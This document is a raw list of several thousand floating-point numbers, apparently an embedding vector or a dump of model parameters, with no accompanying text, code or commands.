0.021092912182211876, -0.008824732154607773, -0.006544709671288729, -0.03287843242287636, -0.009040848352015018, 0.003872076515108347, 0.020372524857521057, 0.027561981230974197, 0.036480363458395004, -0.03521248325705528, -0.003122874768450856, -0.005835129413753748, 0.007722541224211454, 0.011410919018089771, 0.013118235394358635, 0.07042496651411057, 0.060742974281311035, -0.006440253928303719, -0.006198924500495195, -0.008234015665948391, -0.04143662005662918, -0.02633732371032238, 0.014868773519992828, 0.013449613004922867, -0.01316145807504654, -0.030832534655928612, -0.00598280830308795, 0.01812491938471794, -0.008183588273823261, -0.01739012636244297, -0.011670258827507496, 0.022922692820429802, 0.00762168737128377, -0.02205822989344597, -0.007232678588479757, 0.02789335884153843, 0.021885337308049202, -0.024377873167395592, -0.0034866698551923037, 0.0187444519251585, 0.014357299543917179, 0.010849017649888992, 0.0035226892214268446, -0.007700929883867502, 0.0007352443062700331, 0.006252953317016363, -0.016511254012584686, -0.037517718970775604, -0.009653177112340927, 0.03697022795677185, -0.026466993615031242, 0.028253551572561264, 0.04071623459458351, 0.03630746901035309, -0.015848498791456223, 0.015430674888193607, -0.007315522991120815, -0.01056806743144989, 0.0004495660832617432, -0.008471743203699589, 0.008680655620992184, -0.0033750098664313555, 0.02299473062157631, 0.009609953500330448, 0.020646272227168083, -0.00999175850301981, 0.005896362010389566, 0.012714819051325321, 0.011835947632789612, -0.005972002632915974, -0.004718530457466841, 0.0020819164346903563, 0.00796747300773859, 0.047314975410699844, -0.04230108484625816, 0.01757742650806904, -0.001466886606067419, -0.01792321167886257, -0.006721204612404108, -0.022533684968948364, -0.031696997582912445, -0.012268179096281528, -0.03921782970428467, -0.0032597482204437256, -0.018283404409885406, -0.02947820909321308, 0.005507353227585554, 0.009797253645956516, 0.013204681687057018, 0.0019252324709668756, -0.022346382960677147, -0.012052062898874283, 0.019032606855034828, -0.033973418176174164, -0.01603579893708229, 0.014443745836615562, -0.019392799586057663, -0.008601413108408451, 0.010222282260656357, 0.02622206136584282, 0.01655447855591774, 0.030573194846510887, -0.04235871508717537, -0.016727371141314507, -0.013327146880328655, 0.004617676138877869, -0.010171854868531227, -0.006177312694489956, 0.05774616822600365, 0.01561797596514225, 0.015445082448422909, 0.008421315811574459, -0.012088082730770111, -0.018384259194135666, -0.00796747300773859, 0.029507024213671684, 0.01904701441526413, 0.019536877050995827, -0.0042935023084282875, -0.0008847244316712022, 0.0177070964127779, 0.02280743047595024, 0.039707694202661514, -0.010719348676502705, 0.019825031980872154, 0.025962723419070244, 0.0045132203958928585, 0.01254192553460598, -0.026077985763549805, 0.015747645869851112, -0.008183588273823261, -0.06437372416257858, 0.008089938201010227, 0.027936581522226334, -0.034722622483968735, 0.0007820694008842111, 0.024738065898418427, 0.03019859455525875, 0.021611589938402176, -0.010949872434139252, 0.020977649837732315, -0.010215078480541706, 0.020458972081542015, 0.005892760120332241, 0.01076977513730526, 0.016093431040644646, -0.004624880384653807, -0.0006505989003926516, 0.01253472175449133, -0.01936398446559906, -0.026798371225595474, 0.040428079664707184, -0.020747127011418343, 0.014537395909428596, -0.030112149193882942, -0.003490271745249629, -0.000856809492688626, -0.011958412826061249, -0.04379948973655701, 0.009271372109651566, 0.0051219468005001545, -0.04218582436442375, -0.018196959048509598, 0.009206537157297134, -0.03673970326781273, -0.022735392674803734, 0.030169779434800148, -0.011202007532119751, 0.022043822333216667, 0.00012606760719791055, 0.0017820557113736868, -0.0070849996991455555, 0.03457854315638542, 0.022317567840218544, 0.02197178266942501, -0.007679318077862263, -0.015877313911914825, -0.0036991836968809366, 0.0041638328693807125, -0.0029409772250801325, 0.019191091880202293, 0.007888230495154858, -0.028455259278416634, 0.015171336010098457, 0.01571882888674736, 0.022735392674803734, 0.01170627772808075, 0.01988266222178936, -0.004275492858141661, -0.01208087895065546, -0.012585149146616459, 0.008313258178532124, 0.02028607949614525, -0.013867436908185482, 0.06005140393972397, 0.003115670755505562, -0.0027464728336781263, -0.008082734420895576, 0.03604813292622566, 0.013060604222118855, -0.01442213449627161, -0.03446328267455101, -0.011648646555840969, -0.001757742604240775, -0.011749501340091228, -0.02040133997797966, 0.013780990615487099, 0.02687040902674198, -0.019320761784911156, 0.019839439541101456, 0.0364515483379364, -0.0068652816116809845, 0.05143558233976364, 0.00307244760915637, -0.010085408575832844, 0.012887711636722088, -0.011944005265831947, 0.01290211919695139, -0.012765245512127876, 0.013269515708088875, 0.018758859485387802, -0.02996807172894478, -0.007012960966676474, 0.024421095848083496, 0.018600374460220337, -0.01082740630954504, -0.0354141928255558, 0.003020219737663865, -0.020775942131876945, -0.01832662895321846, -0.010373563505709171, 0.021280212327837944, -0.002076513599604368, 0.004913034848868847, -0.02280743047595024, -0.0005754085723310709, -0.016943486407399178, 0.03261909261345863, 0.009854884818196297, -0.007924249395728111, 0.004005347844213247, 0.002643817802891135, -0.006098070181906223, -0.000708680076058954, -0.022879470139741898, 0.00852937437593937, -0.02643817849457264, -0.009127294644713402, -0.000710030784830451, 0.012628371827304363, 0.017851173877716064, -0.01290932297706604, -0.024435503408312798, 0.033800527453422546, 0.0182113666087389, -0.027216196060180664, -0.04238753020763397, 0.0031985153909772635, 0.0028887491207569838, -0.010027777403593063, -0.008298850618302822, -0.01861478202044964, 0.00442317221313715, -0.022000597789883614, 0.009141702204942703, 0.04175359010696411, 0.0034740630071610212, 0.020069962367415428, 0.009487488307058811, 0.0286281518638134, -0.007189455442130566, -0.01625191606581211, -0.02800862118601799, -0.00731192110106349, -0.00037752746720798314, -0.03872796893119812, 0.01592053845524788, -0.007441590540111065, 0.010632902383804321, -0.020545417442917824, 0.01311103068292141, -0.0343192033469677, 0.01592053845524788, 0.0028383221942931414, -0.01416279561817646, -0.021885337308049202, 0.002443910576403141, -0.011900781653821468, 0.007715337444096804, 0.0016893058782443404, 0.0011229021474719048, -0.00885354820638895, -0.008666247129440308, 0.010438397526741028, 0.009617157280445099, -0.038583893328905106, 0.01603579893708229, -0.015790868550539017, -0.03443446755409241, 0.0029607878532260656, -0.00090093316975981, 0.019018199294805527, -0.00038270524237304926, -0.02135225012898445, 0.008154773153364658, 0.01208087895065546, -0.017433349043130875, -0.00648347707465291, -0.007953065447509289, -0.0437130406498909, -0.01197282038629055, -0.011180396191775799, -0.028584929183125496, -0.0075280372984707355, 0.03184107691049576, -0.02613561600446701, 0.010899445042014122, -0.02125139720737934, 0.023196440190076828, 0.01998351700603962, 0.03777705878019333, -0.028066251426935196, -0.015603567473590374, 0.0076937261037528515, 0.04705563560128212, -0.03313777223229408, 0.013125439174473286, -0.020732717588543892, -0.007066989783197641, 0.007614483591169119, 0.035241298377513885, -0.017649464309215546, 0.013687340542674065, -0.022303160279989243, 0.00879591703414917, 0.011598220095038414, -0.023873602971434593, 0.022101452574133873, -0.018139326944947243, 0.013204681687057018, 0.00899762474000454, 0.034722622483968735, -0.0037424068432301283, 0.013471224345266819, -0.017260456457734108, 0.012196140363812447, 0.023182032629847527, -0.020458972081542015, 0.011007502675056458, 0.02580423839390278, 0.0096315648406744, 0.013521651737391949, -0.03498195856809616, -0.0010742760496214032, -0.004646491724997759, -0.022850655019283295, -0.03656680881977081, -0.027086526155471802, -0.025905093178153038, -0.032013967633247375, 0.002852729754522443, -0.0011391108855605125, 0.036710888147354126, -0.010784183628857136, 0.0026420168578624725, 0.013780990615487099, 0.035644713789224625, -0.038065213710069656, -0.013456816785037518, -0.010135835967957973, 0.023484595119953156, 0.0028383221942931414, -0.009386633522808552, 0.01030872855335474, -0.03789231926202774, 0.005363276228308678, 0.013305535539984703, 0.021179357543587685, 0.025674568489193916, -0.008464539423584938, -0.015545937232673168, -0.022331975400447845, -0.014184406958520412, 0.001350724371150136, 0.02874341420829296, -0.00999896228313446, 0.01841307431459427, 0.0018910140497609973, 0.0033425926230847836, -0.014710288494825363, -0.006000818219035864, 0.01285889558494091, 0.03048674948513508, -0.008615820668637753, -0.023081177845597267, 0.02083357237279415, -0.003681174013763666, -0.02800862118601799, 0.0021323435939848423, 0.054173052310943604, -0.012253771536052227, -0.04103320464491844, -0.010179058648645878, 0.009357818402349949, 0.004610472358763218, 0.0007798182195983827, -0.012714819051325321, 0.01998351700603962, -0.025544898584485054, 0.024277018383145332, 0.0067356121726334095, 0.043251994997262955, -0.027446718886494637, -0.0011120963608846068, -0.015099297277629375, 0.00762168737128377, -0.01285889558494091, -0.015805276110768318, -0.008493354544043541, 0.0066995928063988686, -0.017332494258880615, 0.001547029591165483, -0.03270553797483444, -0.01145414263010025, -0.02633732371032238, -0.005143558140844107, 0.005716265644878149, -0.01633836142718792, 0.0008838239591568708, 0.018168143928050995, 0.021107319742441177, -0.0239312332123518, -0.025170298293232918, 0.02570338360965252, -0.0015956556890159845, 0.03132239729166031, 0.0016307745827361941, -0.015574752353131771, -0.0031372825615108013, -0.012700410559773445, -0.009840477257966995, -0.019291946664452553, 0.00604043947532773, -0.008356481790542603, -0.011338881216943264, -0.00692651467397809, -0.03636510297656059, 0.01563238352537155, -0.01968095451593399, -0.010640106163918972, -0.014011514373123646, -0.018672414124011993, -0.025573713704943657, -0.008500558324158192, 0.0012912924867123365, 0.016943486407399178, 0.06575686484575272, -0.009926923550665379, 0.01655447855591774, -0.001912625739350915, 0.008197996765375137, 0.005363276228308678, -0.006317788269370794, -0.0017622450832277536, -0.0004333574033807963, 0.005474936217069626, 0.008709470741450787, -0.0058135176077485085, 0.0069481260143220425, 0.01004938967525959, 0.010387971065938473, 0.019176684319972992, -0.014796734787523746, -0.013881844468414783, 0.03558708354830742, -0.02800862118601799, -0.01399710588157177, 0.0177070964127779, 0.013118235394358635, 0.00382525147870183, 0.019421614706516266, -0.028080658987164497, -0.021597182378172874, -0.023066770285367966, -0.04152306914329529, -0.0004714028036687523, 0.01583409123122692, -0.026567848399281502, -0.017462164163589478, 0.004304308444261551, -0.007945860736072063, -0.012815672904253006, 0.025645753368735313, 0.0026978468522429466, -0.012448275461792946, -0.01499844342470169, -0.006721204612404108, -0.01654006913304329, -0.0005898163071833551, 0.013154254294931889, -0.020660679787397385, -0.019637731835246086, 0.006800447124987841, 0.016179876402020454, 0.002894151955842972, -0.002490735612809658, 0.009256964549422264, 0.0012156519806012511, 0.020257264375686646, 0.01524337474256754, 0.0002728463150560856, 0.006090866401791573, -0.015185743570327759, -0.0223751999437809, -0.02822473645210266, -0.0072146691381931305, -0.01498403586447239, 0.006130487658083439, -0.011987228877842426, 0.01342800073325634, -0.00030278737540356815, -0.005284033715724945, -0.006000818219035864, 0.021294619888067245, 0.011238026432693005, 0.019436022266745567, 0.018787674605846405, 0.0062565552070736885, -0.009091275744140148, -0.005521761253476143, -0.0021323435939848423, 0.02478129044175148, 0.006933718454092741, 0.015430674888193607, -0.030313856899738312, 0.004232269711792469, 0.03593286871910095, 0.020069962367415428, -0.021265804767608643, 0.017202826216816902, -0.009833273477852345, 0.03405986726284027, -0.02008436992764473, 0.01842748187482357, -0.011864762753248215, -0.024305835366249084, 0.014270853251218796, 0.0010175456991419196, 0.014854365959763527, -0.020732717588543892, 0.007092203479260206, 0.023815972730517387, 0.005503751337528229, -0.0023376536555588245, -0.029377354308962822, -0.014839958399534225, -0.006087264511734247, -0.013283924199640751, 0.004365541040897369, -0.021827705204486847, -0.016986709088087082, 0.0011553196236491203, 0.012779653072357178, 0.0055181593634188175, -0.001031953375786543, 0.0041638328693807125, -0.03287843242287636, 0.005838731303811073, 0.026423770934343338, -0.012664391659200191, -0.015488306060433388, 0.008493354544043541, -0.006155701354146004, 0.004502414725720882, -0.018758859485387802, -0.025544898584485054, -0.02695685625076294, -0.012707614339888096, 0.03175462782382965, -0.015272189863026142, 0.00601162388920784, 0.013291127979755402, 0.0062925745733082294, -0.018470704555511475, 0.03570234775543213, 0.03561589866876602, 0.01633836142718792, 0.009206537157297134, 0.009242556989192963, 0.000791524478700012, 0.019551284611225128, -0.017851173877716064, 0.017303679138422012, 0.003933309111744165, -0.013521651737391949, -0.0013552267337217927, -0.0022241927217692137, 0.026481401175260544, 0.025343190878629684, -0.000820790184661746, 0.013889048248529434, 0.003547902684658766, -0.006224137730896473, 0.0286137443035841, 0.028152696788311005, 0.030457934364676476, -0.0036577614955604076, -0.04238753020763397, -0.001306600752286613, 0.02478129044175148, -0.006382622756063938, -0.0007649602484889328, 0.019493654370307922, -0.03351237252354622, 0.002465522149577737, 0.007607279811054468, 0.013557670637965202, -0.010315932333469391, 0.029420576989650726, 0.0008018800290301442, -0.009523507207632065, 0.027749281376600266, 0.006620350293815136, -0.036163393408060074, -0.009559526108205318, -0.01884530670940876, 0.024406688287854195, 0.004650093615055084, -0.019018199294805527, 0.01385302934795618, 0.008161976933479309, 0.020948834717273712, -0.0030850544571876526, 0.029305316507816315, 0.007823395542800426, -0.03480906784534454, -0.02060304954648018, -0.013629709370434284, -0.0049922773614525795, -0.03515485301613808, 0.016223100945353508, -0.017937619239091873, -0.002980598481371999, -0.00307244760915637, -0.035875238478183746, -0.004037765320390463, -0.0012021446600556374, 0.0312359519302845, -0.015416267327964306, 0.0038432609289884567, 0.0073911636136472225, -0.004700520541518927, -0.000674011476803571, -0.02446432039141655, -0.0007982780807651579, -0.0016712963115423918, -0.009033644571900368, 0.00018921396986115724, -0.019724177196621895, 0.014278057031333447, -0.01728927157819271, -0.030832534655928612, -0.014602230861783028, 0.034405652433633804, -0.005208393093198538, -0.00931459479033947, -0.02123698964715004, 0.032734353095293045, 0.018196959048509598, 0.001776652759872377, 0.01615106128156185, 0.018081696704030037, -0.007005757186561823, -0.006566321477293968, -0.0036685673985630274, -0.025588123127818108, -0.016093431040644646, 0.02540082111954689, 0.013089419342577457, -0.011670258827507496, -0.030429119244217873, 0.02125139720737934, 0.004570851102471352, 0.005417305044829845, 0.009192129597067833, 0.002805904718115926, -0.03927546367049217, -0.0069589316844940186, -0.000676712894346565, 0.0016676943050697446, 0.009595545940101147, 0.015805276110768318, 0.0333106629550457, 0.005010286811739206, -0.009473079815506935, 0.008075530640780926, 0.004469997249543667, 0.01140371523797512, -0.004599666688591242, -0.000668608583509922, 0.0030040109995752573, -0.0001985564740607515, 0.010532048530876637, -0.006238545756787062, -0.01934957690536976, 0.01861478202044964, -0.008378093130886555, 0.0011193002574145794, -0.012412256561219692, -0.011893577873706818, -0.008896770887076855, 0.025977130979299545, -0.007455998566001654, -0.005031898617744446, -0.004923840519040823, 0.02872900664806366, 0.006004420109093189, -0.020444564521312714, -0.0058135176077485085, 0.02455076575279236, -0.020444564521312714, 0.022764207795262337, 0.0006875186809338629, 0.0008451032335869968, 0.019940294325351715, -0.0019774604588747025, 0.01405473705381155, -0.004019755870103836, 0.021208172664046288, -0.02028607949614525, 0.004135017283260822, 0.002867137547582388, 0.005806313827633858, -0.0009914316469803452, 0.00006252728053368628, -0.00041624822188168764, -0.010222282260656357, 0.03985176980495453, 0.012433867901563644, -0.04541315510869026, -0.0014317678287625313, -0.027533166110515594, -0.01894615963101387, -0.0038432609289884567, -0.025328783318400383, -0.003594727721065283, 0.005662236362695694, 0.0030184187926352024, 0.003655960550531745, -0.027115341275930405, 0.019436022266745567, 0.009386633522808552, -0.031380027532577515, 0.03685496374964714, 0.006332195829600096, 0.02030048705637455, 0.014242037199437618, 0.0312359519302845, 0.006876087281852961, -0.004981471225619316, -0.009285779669880867, -0.002494337735697627, -0.019925884902477264, 0.019032606855034828, 0.000455194094683975, -0.009912515990436077, -0.006407836452126503, -0.015805276110768318, -0.00910568330436945, -0.026524623855948448, 0.01019346620887518, -0.010452806018292904, -0.019925884902477264, -0.010870629921555519, -0.017505386844277382, 0.020473379641771317, 0.016612108796834946, -0.00941544957458973, -0.03786350414156914, -0.02374393306672573, -0.029334131628274918, -0.0005880153621546924, 0.011612627655267715, -0.003800037782639265, 0.024853328242897987, -0.02914683148264885, 0.008104345761239529, 0.012527517974376678, 0.03913138434290886, -0.01946483924984932, -0.0022151879966259003, 0.006260157097131014, 0.017836766317486763, 0.01385302934795618, -0.012311402708292007, 0.010697737336158752, -0.0364515483379364, 0.018254589289426804, 0.003886484308168292, 0.016323953866958618, 0.008608616888523102, -0.001226457767188549, -0.011583812534809113, 0.02687040902674198, -0.003506480483338237, -0.009775642305612564, -0.008882363326847553, -0.00885354820638895, 0.011951209045946598, 0.008255627006292343, 0.022432830184698105, 0.023340517655014992, 0.0006055747508071363, 0.000002996919647557661, 0.022418422624468803, -0.014133979566395283, 0.0007969273719936609, -0.003144486341625452, -0.006645563989877701, -0.014868773519992828, 0.007405571639537811, -0.024291427806019783, -0.008709470741450787, 0.011338881216943264, -0.001981062348932028, -0.009487488307058811, -0.005100334994494915, -0.017029933631420135, 0.004203454125672579, -0.002361066173762083, 0.00796747300773859, 0.001986465184018016, 0.03247501701116562, -0.016900263726711273, 0.005302043166011572, 0.03581760823726654, -0.017779134213924408, -0.0015281194355338812, -0.015646791085600853, 0.019551284611225128, -0.0027338662184774876, 0.007953065447509289, 0.0017343300860375166, 0.01779354177415371, 0.020732717588543892, -0.009343410842120647, 0.013701748102903366, 0.03365644812583923, 0.01593494601547718, 0.03414631262421608, 0.008450131863355637, -0.0013939475174993277, 0.0006190820131450891, 0.0020494991913437843, -0.023268477991223335, 0.000678063603118062, 0.007463202346116304, -0.019839439541101456, -0.00847894698381424, 0.01563238352537155, 0.0026996477972716093, 0.00008847244316712022, -0.015992576256394386, -0.00854378193616867, 0.024507543072104454, -0.015891721472144127, -0.0028707394376397133, 0.010063797235488892, -0.009473079815506935, -0.0011364094680175185, -0.018052881583571434, 0.0011499166721478105, -0.01530100591480732, 0.011879170313477516, -0.013204681687057018, -0.020574232563376427, 0.01613665372133255, 0.0038756784051656723, -0.013766583055257797, -0.019104644656181335, 0.005013888701796532, -0.02800862118601799, -0.01285889558494091, -0.0031264766585081816, 0.00483739422634244, -0.02436346560716629, -0.004426774103194475, 0.0015596364391967654, -0.00705258222296834, -0.011677462607622147, 0.0006627553957514465, 0.0026077984366565943, -0.023974457755684853, -0.010092612355947495, -0.010315932333469391, 0.01285889558494091, 0.022648945450782776, -0.025055035948753357, -0.00632859393954277, -0.0009031843510456383, -0.003821649355813861, -0.009437060914933681, -0.01834103651344776, -0.01411236822605133, -0.012628371827304363, -0.005057111848145723, 0.00708139780908823, -0.0050282967276871204, 0.009566730819642544, 0.00904805213212967, -0.009703603573143482, -0.006915708538144827, 0.002020683605223894, 0.01197282038629055, 0.011785520240664482, -0.007758560590445995, 0.03944835439324379, -0.023398147895932198, 0.03091898187994957, 0.009091275744140148, 0.01113717257976532, 0.010978687554597855, 0.003247141372412443, -0.0002063231513602659, 0.007117416709661484, -0.005078723654150963, 0.022764207795262337, 0.017101971432566643, -0.001505607389844954, -0.010611290112137794, 0.020012332126498222, -0.006519496440887451, -0.006922912783920765, -0.027432311326265335, 0.0010085408575832844, -0.015589159913361073, 0.005024694837629795, 0.02603476122021675, 0.0012102490290999413, 0.0026618274860084057, -0.0032579470425844193, -0.008039511740207672, 0.006220535840839148, -0.001394847990013659, 0.013413593173027039, -0.003738804953172803, 0.01399710588157177, 0.012830080464482307, -0.007953065447509289, 0.024003272876143456, 0.029651101678609848, -0.0065519134514033794, 0.016266323626041412, 0.011302861385047436, 0.008911178447306156, -0.020271671935915947, -0.013867436908185482, -0.01747657172381878, 0.010798591189086437, -0.015574752353131771, 0.0009446065523661673, -0.016367176547646523, -0.0004993177717551589, 0.000392385438317433, 0.0076865218579769135, -0.019234314560890198, -0.008017899468541145, -0.008961605839431286, -0.013002973049879074, -0.009501895867288113, 0.010063797235488892, 0.015416267327964306, -0.01936398446559906, 0.0030022100545465946, -0.018874121829867363, -0.0031066660303622484, 0.0021053289528936148, 0.0013732364168390632, 0.006191720254719257, -0.031149504706263542, -0.00011537437239894643, 0.0008991321665234864, 0.011879170313477516, -0.012217751704156399, 0.00642584590241313, -0.0053452663123607635, -0.0046428898349404335, -0.003553305519744754, -0.008918383158743382, -0.009256964549422264, 0.015891721472144127, -0.002598793711513281, 0.022000597789883614, 0.004408764187246561, -0.005773896351456642, 0.005889158230274916, 0.006695990916341543, -0.004019755870103836, 0.00013417194713838398, 0.02852729894220829, 0.01202324777841568, 0.0009959341259673238, -0.007981880567967892, 0.010078204795718193, -0.005946788936853409, 0.00414222152903676, 0.019695362076163292, 0.002244003349915147, 0.005734275095164776, -0.011331676505506039, 0.0005303844227455556, 0.01317586563527584, -0.014667065814137459, -0.015027258545160294, 0.008839140646159649, 0.02028607949614525, -0.00011216640268685296, -0.019623324275016785, 0.029492616653442383, 0.004077386576682329, 0.005446120630949736, 0.011482957750558853, -0.003176903584972024, -0.00043133131111972034, 0.012469887733459473, -0.018470704555511475, -0.004052172880619764, -0.0056946538388729095, 0.005972002632915974, 0.0018171744886785746, -0.009653177112340927, 0.016295138746500015, 0.0088463444262743, -0.03636510297656059, -0.004704122897237539, -0.010006166063249111, 0.018485113978385925, -0.023455778136849403, -0.02790776640176773, 0.003135481383651495, -0.02112172730267048, -0.002227794611826539, 0.008493354544043541, -0.002645618747919798, -0.015315413475036621, -0.007571260444819927, 0.004635686054825783, 0.024507543072104454, -0.025660160928964615, -0.026812778785824776, -0.016525661572813988, -0.008356481790542603, 0.009278575889766216, -0.023988865315914154, 0.008111550472676754, 0.01109394896775484, -0.009775642305612564, 0.03985176980495453, 0.0063862246461212635, -0.009566730819642544, -0.01051043625921011, 0.0012174529256299138, 0.041494254022836685, -0.009761234745383263, -0.013312739320099354, -0.013391981832683086, 0.0051579661667346954, 0.00019934440206270665, 0.008947198279201984, 0.00627096276730299, -0.00256277434527874, 0.007301115430891514, 0.003810843685641885, 0.008810324594378471, -0.014710288494825363, -0.04302147030830383, 0.013716155663132668, -0.003947717137634754, 0.009220944717526436, 0.004851801786571741, 0.002375473966822028, -0.001405653776600957, 0.005727071315050125, -0.014559007249772549, -0.007063387893140316, 0.0036667664535343647, 0.014486969448626041, 0.01854274421930313, 0.01695789396762848, 0.016727371141314507, -0.016468031331896782, 0.031063057482242584, -0.023282885551452637, 0.001729827607050538, -0.01633836142718792, -0.00091038818936795, 0.015156928449869156, -0.001364231575280428, -0.03705667331814766, 0.008298850618302822, -0.02050219476222992, 0.010236689820885658, 0.0333394780755043, -0.0017289271345362067, 0.0005983709124848247, -0.0026059974916279316, -0.009494692087173462, 0.030976612120866776, -0.016511254012584686, 0.005910769570618868, 0.011346084997057915, -0.004250279162079096, -0.006094468291848898, -0.007218271028250456, -0.0069949510507285595, -0.0014930006582289934, 0.021683627739548683, 0.002577182138338685, -0.013716155663132668, -0.0038432609289884567, 0.007938656955957413, 0.007193057332187891, -0.028786636888980865, 0.014393318444490433, 0.0032201269641518593, 0.001018446171656251, -0.0037568146362900734, 0.021366657689213753, -0.003990940283983946, -0.0036955818068236113, -0.011468550190329552, 0.012477091513574123, 0.0018784073181450367, -0.007275901734828949, -0.002022484550252557, 0.0036793730687350035, 0.013665728271007538, 0.0015092093963176012, 0.006227739620953798, -0.009192129597067833, 0.0066059427335858345, -0.012930934317409992, -0.008918383158743382, -0.001669495366513729, -0.003556907409802079, -0.015344228595495224, 0.026481401175260544, 0.0017460363451391459, -0.0028689384926110506, -0.006584330927580595, 0.01602139137685299, -0.04109083488583565, -0.011288453824818134, 0.01656888611614704, -0.005165169946849346, -0.005276829935610294, 0.0006127785891294479, -0.015805276110768318, -0.01664092391729355, -0.0038180474657565355, -0.0010670722695067525, -0.009862088598310947, 0.012693206779658794, -0.0021467511542141438, 0.0006168307736515999, 0.0017253252444788814, 0.003861270612105727, -0.026265285909175873, 0.013075011782348156, 0.008731082081794739, 0.007383959833532572, 0.012923730537295341, -0.004491608589887619, -0.01612224616110325, 0.010596882551908493, -0.011612627655267715, -0.0038540668319910765, 0.007931453175842762, -0.010078204795718193, -0.011785520240664482, -0.0066527677699923515, -0.015473898500204086, -0.009703603573143482, -0.009213740937411785, -0.014616638422012329, 0.002892351010814309, 0.02175566740334034, 0.02936294674873352, 0.027100933715701103, 0.0038936880882829428, -0.00002408791806374211, 0.006231341511011124, -0.009451468475162983, -0.005528965033590794, -0.01643921621143818, -0.020271671935915947, 0.043482519686222076, -0.008399704471230507, 0.005312849301844835, 0.0034776648972183466, 0.008327665738761425, 0.00032304823980666697, -0.009970147162675858, 0.010157447308301926, -0.01779354177415371, 0.012253771536052227, -0.016943486407399178, -0.0034938736353069544, -0.02352781780064106, 0.005352470558136702, 0.0032921654637902975, -0.017620649188756943, 0.0012246567057445645, -0.019032606855034828, -0.009141702204942703, -0.007744153030216694, -0.004671705421060324, 0.011720685288310051, 0.009141702204942703, 0.01937839202582836, 0.006094468291848898, -0.0030184187926352024, -0.00005633646287606098, -0.022360792383551598, -0.004005347844213247, -0.019032606855034828, -0.013889048248529434, 0.013889048248529434, 0.033570002764463425, -0.007337134797126055, 0.003290364518761635, 0.000261590292211622, -0.006930116564035416, -0.043770674616098404, 0.006768029648810625, -0.015113704837858677, 0.024925366044044495, -0.013024584390223026, -0.02416175790131092, 0.013384778052568436, 0.01462384220212698, 0.00098242680542171, -0.02374393306672573, -0.0023790758568793535, 0.003393019549548626, -0.022259937599301338, 0.0032399375922977924, -0.01854274421930313, -0.015589159913361073, -0.004390754736959934, -0.011799927800893784, -0.0012363630812615156, -0.012585149146616459, 0.006922912783920765, 0.015488306060433388, 0.0004849100369028747, -0.0017811552388593554, -0.03990940377116203, 0.0002744221710599959, -0.006634757854044437, 0.014544599689543247, 0.02780691161751747, 0.015214559622108936, -0.001943242154084146, 0.0007820694008842111, 0.005330858752131462, -0.016410401090979576, -0.0014939011307433248, -0.013665728271007538, 0.008702266961336136, 0.00449881237000227, -0.0007410974358208477, 0.003252544207498431, 0.023571040481328964, 0.03622102364897728, 0.007232678588479757, 0.01958009973168373, -0.0023700708989053965, -0.006508690305054188, -0.0016388788353651762, -0.011115561239421368, -0.008976013399660587, -0.0030400303658097982, -0.023455778136849403, 0.008932790718972683, -0.0028023028280586004, -0.016266323626041412, -0.0076937261037528515, -0.01780794933438301, 0.012037655338644981, -0.01411236822605133, -0.02247605286538601, -0.007211067248135805, -0.013204681687057018, -0.014119572006165981, 0.01316145807504654, -0.006249351426959038, 0.01378819439560175, 0.013262311927974224, 0.012160121463239193, 0.004109804052859545, -0.012808469124138355, 0.001613665372133255, -0.016583293676376343, -0.006198924500495195, -0.009840477257966995, 0.01296695414930582, -0.002429502783343196, -0.006451059598475695, 0.01399710588157177, 0.030342672020196915, -0.0033227819949388504, 0.006750019732862711, -0.01571882888674736, -0.02914683148264885, -0.009156109765172005, -0.0007424481445923448, -0.002108931075781584, 0.0021503532771021128, -0.017635056748986244, 0.005608207546174526, -0.025948315858840942, -0.019191091880202293, 0.02508385106921196, -0.009847681038081646, 0.012066471390426159, -0.010380767285823822, 0.009890904650092125, 0.0002180294250138104, 0.015459490939974785, 0.018081696704030037, 0.0007784674526192248, 0.0003444347239565104, -0.01019346620887518, -0.03351237252354622, 0.005467732436954975, 0.008104345761239529, 0.00790984183549881, -0.023297293111681938, -0.0137953981757164, -0.006382622756063938, -0.013204681687057018, 0.01612224616110325, -0.003706387709826231, -0.0004326820489950478, -0.005100334994494915, -0.008774305693805218, 0.020862387493252754, 0.002631210954859853, 0.027504349127411842, 0.05379845201969147, 0.0033840148244053125, -0.0031949132680892944, -0.00510393688455224, 0.01295975036919117, 0.007211067248135805, 0.003290364518761635, 0.0012723823310807347, 0.016424808651208878, 0.026063576340675354, -0.002676235279068351, 0.007254290394484997, -0.0033551992382854223, -0.00878871325403452, -0.01061849482357502, 0.013348758220672607, 0.012484295293688774, 0.006415040232241154, -0.020948834717273712, 0.013456816785037518, 0.017822356894612312, 0.00842851959168911, -0.013406389392912388, -0.029492616653442383, -0.020228447392582893, 0.009862088598310947, 0.012491499073803425, 0.008392500691115856, 0.0030454332008957863, -0.0014263648772612214, 0.02018522471189499, -0.0004590211610775441, -0.004974267445504665, -0.00471132667735219, 0.0021503532771021128, -0.005514557473361492, -0.005896362010389566, 0.0014993040822446346, 0.01602139137685299, 0.014386114664375782, -0.03279198706150055, 0.014249241910874844, -0.01056086365133524, -0.015373043715953827, -0.014011514373123646, -0.012116897851228714, -0.01643921621143818, 0.0023214449174702168, -0.010330339893698692, -0.03486669808626175, -0.027936581522226334, -0.027504349127411842, 0.001845989958383143, -0.0046825110912323, 0.011432531289756298, -0.0014803939266130328, 0.02061745710670948, 0.019090237095952034, -0.01201604399830103, -0.007074193563312292, -0.032330937683582306, 0.005817119497805834, -0.0145662110298872, -0.008205200545489788, 0.028556114062666893, -0.016367176547646523, -0.013961086980998516, -0.005561382509768009, -0.015445082448422909, 0.012109694071114063, 0.006508690305054188, 0.014652658253908157, -0.012714819051325321, -0.015113704837858677, 0.002980598481371999, -0.006894097197800875, -0.028195921331644058, -0.005100334994494915, 0.0036829751916229725, -0.0014137581456452608, -0.020257264375686646, 0.019421614706516266, -0.010841813869774342, -0.012894915416836739, -0.013312739320099354, -0.007383959833532572, 0.0053344606421887875, -0.001134608406573534, -0.03426157310605049, -0.014501377008855343, -0.004714928567409515, -0.007801783736795187, 0.009595545940101147, 0.009127294644713402, 0.017346901819109917, -0.014868773519992828, -0.014667065814137459, -0.01832662895321846, 0.011410919018089771, -0.01290211919695139, 0.013701748102903366, 0.003753212746232748, 0.0005677544977515936, 0.009480283595621586, 0.015862906351685524, -0.011367696337401867, 0.01004938967525959, -0.03175462782382965, 0.0068292622454464436, -0.020343709737062454, -0.014011514373123646, -0.002856331877410412, -0.008961605839431286, 0.02538641355931759, -0.002991404151543975, -0.011122765019536018, 0.023484595119953156, 0.004880617372691631, -0.022245530039072037, -0.015315413475036621, 0.015891721472144127, -0.009833273477852345, -0.013255108147859573, 0.0022980323992669582, -0.01004938967525959, -0.013809805735945702, -0.0029715935233980417, 